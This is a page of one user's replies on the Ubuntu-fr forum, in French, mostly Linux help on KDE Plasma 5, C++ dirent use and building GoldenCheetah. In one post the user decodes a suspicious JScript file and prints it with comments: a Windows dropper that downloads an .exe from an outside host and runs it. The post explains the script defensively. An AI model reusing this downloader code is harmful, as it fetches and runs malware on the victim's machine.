Contenu | Rechercher | Menus

Annonce

Ubuntu-fr.org recrute toujours de nouveaux modérateurs, avec de l'expérience.

Ubuntu 16.04 LTS
Commandez vos DVD et clés USB Ubuntu-fr !

Si vous avez des soucis pour rester connecté, déconnectez vous et reconnectez vous depuis ce lien en cochant le case
Me connecter automatiquement lors de mes prochaines visites.

nombre réponses : 25

#0 Re : -1 »  (I'm Back !) je débarque sous KDE SC 5.X aide moi svp ! » Le 25/04/2016, à 19:32

louis94
Réponses : 15

Bonjour,

jajaX a écrit :

par exemple, pour le calendrier, de l'horloge numérique,, je ne vois pas les événements. normal ?

Ils ont en effet disparu. Maintenant que Kontact est passé sous Qt5, ils devraient réapparaître.

jajaX a écrit :

ayant encore des bouts de kde 4.x, je ne sais pas si akonadi est encore d'actualité.

Akonadi existe toujours et sert encore à KMail & co. Il est en train d'être réécrit de fond en comble.

jajaX a écrit :

baloo turbine comme un fou mais la recherche ne me donne pas de résultats....

Il y a deux possibilités. Soit il est en train d'indexer ton système, soit c'est un bogue. Je ne l'ai plus vu depuis quelques semaines, mais je suis sous Plasma 5.6 maintenant (Arch Linux). On peut sans problème tuer les processus baloo-file quand ils se mettent à tourner en rond.

jajaX a écrit :

ktorrent a été porté sous qt5 (vu dans une actu) mais je n'ai qu'une version qt4 de dispo...

Ubuntu (en particulier avec les LTS) a toujours quelques mois de retard. La nouvelle version est sortie cette semaine.

jajaX a écrit :

je n'ai plus que un bureau. j'en mets 2 mais pas moyen de les rendre "différents". c'est en travaux encore ?

Bogue confirmé : https://bugs.kde.org/show_bug.cgi?id=341143#c167

jajaX a écrit :

les ppa ne semblent pas encore supporter la dernière version de kubuntu. j'espère qu'on aura la dernière version de plasma (et cie) assez vite !

Si tu restes sur les LTS, tu n'auras jamais la dernière version, et tu traîneras Plasma 5.5 pendant deux ans. Un projet intéressant pour avoir les dernières versions des programmes de Kde est Kde Neon : c'est la dernière version des programmes avec un Ubuntu LTS en-dessous (mais seulement dispo en 64 bits, donc pas pour ton ordi actuel). J'ai aussi lu que les traductions n'étaient pas toutes disponibles.

Louis

#1 Re : -1 »  (I'm Back !) je débarque sous KDE SC 5.X aide moi svp ! » Le 25/04/2016, à 21:18

louis94
Réponses : 15
jajaX a écrit :

- mon thème superkaramba est sur fond noir. je n'ai pas de réglage pour la transparence (ou c'est translucidité maintenant ?) ou le composite. une idée ?

L'activation du compositeur a migré vers Matériel > Affichage et surveillance. Il devrait revenir à une place plus logique dans la 5.7.

On peut gérer la transparence de manière plus fine en allant dans Comportement de l'espace de travail > Effets du bureau. Là, dans le bouton à côté de « Obtenir de nouveaux effets », décoche « Exclude internal Desktop Effects ». Tu auras alors accès aux paramètres de l'effet « Translucidité ». Je n'ai pas trouvé plus fin.

jajaX a écrit :

- qu'en est-il des fameux drivers FGLRX d'AMD/ATI. il ne sera jamais remis ?

Je n'ai pas suivi ça, je trouve le pilote libre suffisant sur ma vieille Radeon HD 6250. J'imagine qu'AMD continuera à publier ses pilotes proprio, mais il leur faut peut-être un peu de temps.

Louis

#2 Re : -1 »  [Résolu] Recherche application texte comme le bloc note de Windows » Le 23/06/2016, à 11:50

louis94
Réponses : 16

Bonjour,

Mousepad comme Gedit sont supérieurs au Bloc-notes de Windows. Je te conseille d'utiliser plutôt un meilleur programme sous Windows : par exemple, Notepad++.

Si tu tiens au Bloc-notes, tu dois enregistrer tes fichiers avec le codage de caractères ISO-8859-1, qui est de seul que Bloc-notes pourra lire sans problème. Tu dois aussi utiliser des fins de ligne CR-LN (dites « Windows ») et pas seulement LN (dites « Unix »). Gedit comme Mousepad en sont capables, mais tu il faudra peut-être un peu chercher dans la configuration.

Louis

#3 Re : -1 »  DigiKam corbeille pleine » Le 16/05/2016, à 03:17

louis94
Réponses : 7

Bonjour,

[Je ne sais pas si ça va fonctionner, mais c'est à essayer.]
Dans Dolphin (installe-le si ce n'est pas déjà fait), va dans Contrôle > Configurer Dolphin. Il devrait y avoir un onglet « Corbeille » avec une série de paramètres. Ajuste-les comme bon te semble, applique-les et réessaye avec DigiKam.

Louis

#4 Re : -1 »  [C++] invalid use of incomplete type ‘struct __dirstream’ » Le 05/06/2016, à 15:18

louis94
Réponses : 4

Bonjour,

Tu utiliser une API faite pour C depuis C++. C'est tout à fait possible, mais il faut s'attendre à ce que certaines choses soient différentes. Ici,  closedir() se charge de libérer la mémoire comme un grand (source). Tu ne dois donc plus faire delete après.

Louis

NB:
Est-ce que tu as regardé du côté de boost::filesystem ou même de std::filesystem (C++17) ?

#5 Re : -1 »  [C++] invalid use of incomplete type ‘struct __dirstream’ » Le 05/06/2016, à 15:45

louis94
Réponses : 4

[edit] Pas de delete ici:[/edit]

void Directory::close()
{
  closedir(_dir);
}

Tu devrais aussi faire _dir = nullptr.

Si tu veux éviter des erreurs de segmentation, tu dois vérifier dans toutes les méthodes que _dir != nullptr. Tu as aussi une fuite mémoire si tu considères le code suivant:

Directory home("/home");
home.open();
home.open();

Louis

#6 Re : -1 »  Konqueror KDE - Platform Version 4.13.3 » Le 05/06/2016, à 15:03

louis94
Réponses : 1

Bonjour,

Konqueror utilise un très ancien moteur Web, et les sites récents sont généralement mal supportés. On peut (un peu) améliorer les choses en installant kpart-webkit et en choisissant WebKit à la place de KHTML dans les préférences (onglet « Général »). Mais la version de WebKit commence aussi à prendre de l'âge.

Louis

#7 Re : -1 »  Installer owncloud à partir de sources tar.xz » Le 28/05/2016, à 14:46

louis94
Réponses : 2

Bonjour,

Tu auras sans doute besoin d'installer plusieurs paquets de développement. Pour compiler, a priori, tu dois faire

mkdir build
cd build
cmake ..
make

Louis

#8 Re : -1 »  Nouveautés dans Xenial » Le 18/04/2016, à 13:18

louis94
Réponses : 840

Des nouveautés du côté de LibreOffice (merci KDE !) :
https://kdeonlinux.wordpress.com/2016/0 … or-ubuntu/

Louis

#9 Re : -1 »  Nouveautés dans Xenial » Le 21/04/2016, à 15:50

louis94
Réponses : 840
Christophe C a écrit :

la nouvelle logithèque ne voit toujours pas tout les logiciels des dépôts, ni même tous ceux installés. Plank, par exemple n'est pas trouvé sur les dépôts, ni parmi les logiciels installés (il l'est chez moi).

L'ancien Ubuntu Sowftware-center le trouve par contre sans problème.

Techniquement parlant, c'est parce que GNOME Software n'affiche que les logiciels qui ont des données Appstream − un standard pour fournir des métadonnées sur les applications. Celui-ci s'appuie sur les auteurs des programmes pour fournir une description correcte (et la même partout). Apparemment, Plank n'a pas suivi.

Louis

#10 Re : -1 »  Nouveautés dans Xenial » Le 23/04/2016, à 23:20

louis94
Réponses : 840
Oni_Shadow a écrit :

En même temps, la majorité des proc sont en 64bit depuis... 2003. Si google est pas capable de coder en 64, ce n'est pas à ubuntu de garder des bibliothèques archaïques.
Google earth est de plus accessible sur internet, moyennant un pluggin.

Le plugin en question n'est pas disponible pour Linux. Par contre le paquet existe en 64 bits chez Google,
1461446269.png
Il suffit donc de le télécharger et de l'installer.

Louis

#11 Re : -1 »  Nouveautés dans Xenial » Le 23/04/2016, à 23:33

louis94
Réponses : 840
Coeur Noir a écrit :
louis94 a écrit :

Le plugin en question n'est pas disponible pour Linux. Par contre le paquet existe en 64 bits chez Google,
http://pix.toile-libre.org/upload/img/1461446269.png
Il suffit donc de le télécharger et de l'installer.

(...) The 64bit debian package depends on ia32-libs which is deprecated and no longer available as of 13.10 Saucy. Use the 32bit package and multiarch-support."

Je ne pensais pas que Google aurait rendu disponible un paquet non installable… Naïf que je suis.

#12 Re : -1 »  Ressources requises : KDE vs Windows 10 » Le 24/03/2016, à 16:19

louis94
Réponses : 7

Bonjour,

Parler de KDE n'a pas vraiment de sens : tout dépend de l'usage qu'on fait du bureau. Un système avec une session Plasma 5 peut ne consommer que 500 Mo de mémoire, à peu près autant que Firefox avec quelques onglets. Si on ajoute Akonadi, Baloo et quelques autres services, on peut vite arriver à 1 Go − mais avec des fonctionnalités supplémentaires : recherche, calendrier, courriel, …

Plasma reste utilisable sur un système avec 2 Go de mémoire vive et un processeur double cœur à 1,3 GHz. Sa principale faiblesse est la durée de son démarrage. Sur le même système, Firefox est extrêmement lent. KWin traîne une sale réputation, mais beaucoup de gestionnaires de fenêtres se sont en fait alignés dessus ces dernières années − avec les mêmes conséquences sur l'utilisation des ressources.

Louis

#13 Re : -1 »  Du JS dégueu incompréhensible » Le 18/03/2016, à 01:04

louis94
Réponses : 5

Bonjour,

On peut décoder sans trop de difficultés :

// C'est du code fait pour Windows. Le plugin ActiveX "WScript.Shell" permet d'exécuter des commandes.
var wscript = new ActiveXObject("WScript.Shell");
// Il s'apprête à charger quelque chose depuis le Web
var requete = new ActiveXObject("MSXML2.XMLHTTP");
// Un nom de fichier dans un dossier temporaire
var nom_de_fichier = wscript.ExpandEnvironmentStrings("%TEMP%") + "/qwRojzl.exe";
// C'est la fonction qui sera exécutée quand on aura chargé quelque chose.
requete.onreadystatechange = function() {
  // Si on a pu charger quelque chose
  if (requete.readystate === 4) {
    // On crée un objet qui peut lire ou écrire des fichiers
    var out = new ActiveXObject("ADODB.Stream");
    out.open();
    out.type = 1;
    // On écrit ce qu'on a téléchargé dans le fichier
    out.write(requete.ResponseBody);
    out.position = 0;
    // On sauve
    out.saveToFile(nom_de_fichier);
    out.close();
  }
};
requete.open("http://whatskv.com/v4v5g45hg.exe");
// On va charger le fichier
requete.send();
// Envoyer la requête
wscript.Run(nom_de_fichier, 1, false);
// Lancer le fichier

En bref, c'est du code qui télécharge un fichier et l'exécute.

Louis

#14 Re : -1 »  Du JS dégueu incompréhensible » Le 18/03/2016, à 19:40

louis94
Réponses : 5
Nasman a écrit :

C'est le mode d'emploi des rançongiciels yikes

Pas forcément : il faut encore que le code fonctionne. Pour ça, il faut soit exploiter une faille (ce qui n'est pas fait, à mon avis, dans le code), soit qu'il soit exécuté en-dehors du navigateur (ce qui est plutôt rare). En fait, je doute que ce code arrive encore à quelque chose dans IE ou Outlook.

Louis

#15 Re : -1 »  Du JS dégueu incompréhensible » Le 18/03/2016, à 21:33

louis94
Réponses : 5
alius a écrit :

Cela dit oui il faut vraiment que l'utilisateur exécute le code pour que cela puisse marcher, mine de rien beaucoup  de problème sont aujourd'hui réglé sous Windows, sauf le principal problème bien sur, Windows lui même ?

Je n'ai pas la compétence pour le dire. J'imagine que oui, mais c'est juste une supposition. Il est clair qu'il reste des failles, mais les plus grosses sont sans doute fermées.

Louis

#16 Re : -1 »  read me » Le 16/03/2016, à 20:00

louis94
Réponses : 39

Au vu de tes posts précédents, je te pensais plus expérimenté wink (c'est un compliment)
Pour installer tous ces paquets :

sudo add-apt-repository ppa:beineri/opt-qt542
sudo apt-get update
sudo apt-get install qt54-meta qt54tools

Puis

source /opt/qt54/bin/qt54-env.sh
qmake -recursive
make
sudo make install

Et, si tout se passe bien,

src/GoldenCheetah

Louis

#17 Re : -1 »  read me » Le 16/03/2016, à 21:09

louis94
Réponses : 39

Je n'y comprends plus rien. Quelle version d'Ubuntu utilises-tu ? (J'aurais dû commencer par poser cette question…)

Louis

#18 Re : -1 »  read me » Le 16/03/2016, à 21:49

louis94
Réponses : 39
piter42 a écrit :
louis94 a écrit :

Je n'y comprends plus rien. Quelle version d'Ubuntu utilises-tu ? (J'aurais dû commencer par poser cette question…)

Louis

version 14.04

Comme tu m'avais parlé de GoldenCheetah 2.1, je pensais que tu avais encore la 12.04. Alors que tu m'as déjà dit que c'était la 14.04… Désolé.

Alors, on peut supprimer le PPA, on n'en a pas besoin:

sudo add-apt-repository --remove ppa:beineri/opt-qt542

Puis, pour installer Qt 5 :

sudo apt-get install qt5-default  qt5-qmake   qtbase5-dev-tools libqt5svg5-dev libqt5serialport5-dev libqt5webkit5-dev libqt5multimediawidgets5

Puis rebelotte, qmake etc. J'espère qu'il ne manquera plus rien…

Louis

#19 Re : -1 »  read me » Le 17/03/2016, à 12:45

louis94
Réponses : 39

Il manque encore quelques petites choses, mais ça va mieux (il ne se plaint plus pour Qt Svg, Qt Webkit et Qt SerialPort). On va installer ça:

sudo apt-get install qtmultimedia5-dev qtscript5-dev

Ensuite, tu peux reprendre à partir de qmake -recursive, qui devrait au moins aller plus loin qu'avant.

Louis

#20 Re : -1 »  read me » Le 17/03/2016, à 19:52

louis94
Réponses : 39

Est-ce que tu peux coller le résultat complet de

make

C'est ce qui a l'air de foirer… Sinon, tu aurais src/GoldenCheetah.

Louis

#21 Re : -1 »  read me » Le 17/03/2016, à 20:09

louis94
Réponses : 39
sudo apt-get install libssl-dev

#22 Re : -1 »  read me » Le 17/03/2016, à 20:46

louis94
Réponses : 39

Ce qui se passe, c'est que la commande make crée le fichier si elle à arrive. Puis tu peux l'utiliser si ça c'est bien passé. Si ça se passe mal, make affiche une erreur, qui peut en général se résoudre en installant quelques paquets avec apt-get.

Donc, réessaye d'abord make. S'il te dit « make: *** [quelque chose] Erreur 2 », colle ici l'entièreté de ce qu'il a dit (ou au moins les 20-30 dernières lignes).

Louis

#23 Re : -1 »  read me » Le 17/03/2016, à 21:34

louis94
Réponses : 39

Bon, je ne vois pas de solution propre à ce problème-ci… La solution « sale » est de faire semblant que lrelease-qt4 existe, en utilisant la version de Qt 5 à la place (tu ne dois faire ça qu'une fois, puis make):

sudo ln -s /usr/lib/i386-linux-gnu/qt5/bin/lrelease /usr/lib/i386-linux-gnu/qt5/bin/lrelease-qt4

Louis

#24 Re : -1 »  read me » Le 17/03/2016, à 22:25

louis94
Réponses : 39

Désolé de n'avoir pas été plus utile, alors. Tu as été très persévérant wink
Installer la dernière version d'un programme sur un Ubuntu un peu ancien est souvent difficile (un peu comme installer Internet Explorer 10 sur Windows XP). C'est surtout le cas pour des programmes peu utilisés ou évoluant très vite. GoldenCheetah a l'air de combiner ces deux facteurs aggravants…

Bonne route avec Ubuntu et ton vélo (ou ce que tu veux utiliser avec GoldenCheetah), alors.

Louis